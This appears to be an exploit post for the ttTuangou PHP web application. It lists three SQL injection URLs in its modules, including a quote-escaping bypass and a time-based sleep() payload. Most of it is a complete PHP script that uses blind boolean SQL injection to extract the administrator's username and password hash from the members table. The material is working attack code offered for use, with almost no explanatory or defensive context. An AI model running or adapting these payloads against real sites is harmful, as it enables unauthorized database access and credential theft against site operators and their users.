\modules\ajax\check.mod.php 40 or 63 ::: urldecode -->' bypass gpc
http://localhost/ttTuangou/ajax.php?mod=check&code=email&email=%2527 or 1=2%23
\modules\index.mod.php 542
http://localhost/ttTuangou/?mod=index&code=expressconfirm&id=0 or if(1,sleep(3),1) or 1=2%23
\modules\index.mod.php 189
http://localhost/ttTuangou/?mod=index&code=order&orderid=0 or 1=1%23
<?php
set_time_limit(0);error_reporting(0);
echo " by k4shifz\n http://bbs.wolvez.org\n";
$host='localhost';
$path='tttuangou';
$length=$name=$pass=$t1=$t2=$low=$high=$mid='';
/*********************Start*************************/
$t1=time();
for($v=1;$v<30;$v++)
{
if(http_send(0,0,'='.$v))
{
$length=$v;break;
}
}
if(!$length) exit("\nFailed , Maybe the table prefix isn't `cenwor_`\n");
for($v=1;$v<($length+1);$v++)
{
for($low=33,$high=127;$low<=$high;)
{
$mid=(int)(($low+$high)/2);
if(http_send(1,$v,'='.$mid))
{
$name .= chr($mid);
break;
}
if(http_send(1,$v,'<'.$mid))
{
$high = $mid;
}
else
{
$low = $mid;
}
}
}
for($v=1;$v<33;$v++)
{
for($low=48,$high=103;$low<=$high;)
{
$mid=(int)(($low+$high)/2);
if(http_send(2,$v,'='.$mid))
{
$pass .= chr($mid);
break;
}
if(http_send(2,$v,'<'.$mid))
{
$high = $mid;
}
else
{
$low = $mid;
}
}
}
$t2=time();
echo "\n{$name}:{$pass}\nuse ".($t2-$t1)." s\n";
/**********************Function************************/
function http_send($i=0,$n=1,$ascii=1)
{
global $host,$path;
switch($i)
{
case 0:
$cmd='(SELECT%20length(username)%20FROM%20cenwor_system_members%20where%20uid=1)'.$ascii;
break;
case 1:
$cmd='(SELECT%20ascii(mid(username,'.$n.',1))%20FROM%20cenwor_system_members%20where%20uid=1)'.$ascii;
break;
case 2:
$cmd='(SELECT%20ascii(mid(password,'.$n.',1))%20FROM%20cenwor_system_members%20where%20uid=1)'.$ascii;
break;
}
$fs=fsockopen($host,80);
fputs($fs,"GET /{$path}/ajax.php?mod=check&code=email&email=%2527%20or%20{$cmd}%23 HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\nHost: {$host}\r\n\r\n");
while(!feof($fs))
$data .= fread($fs,1024);
fclose($fs);
if(substr($data,-1,1)==1)
return 1;
else
return 0;
}
?>
推荐
评论(0条)
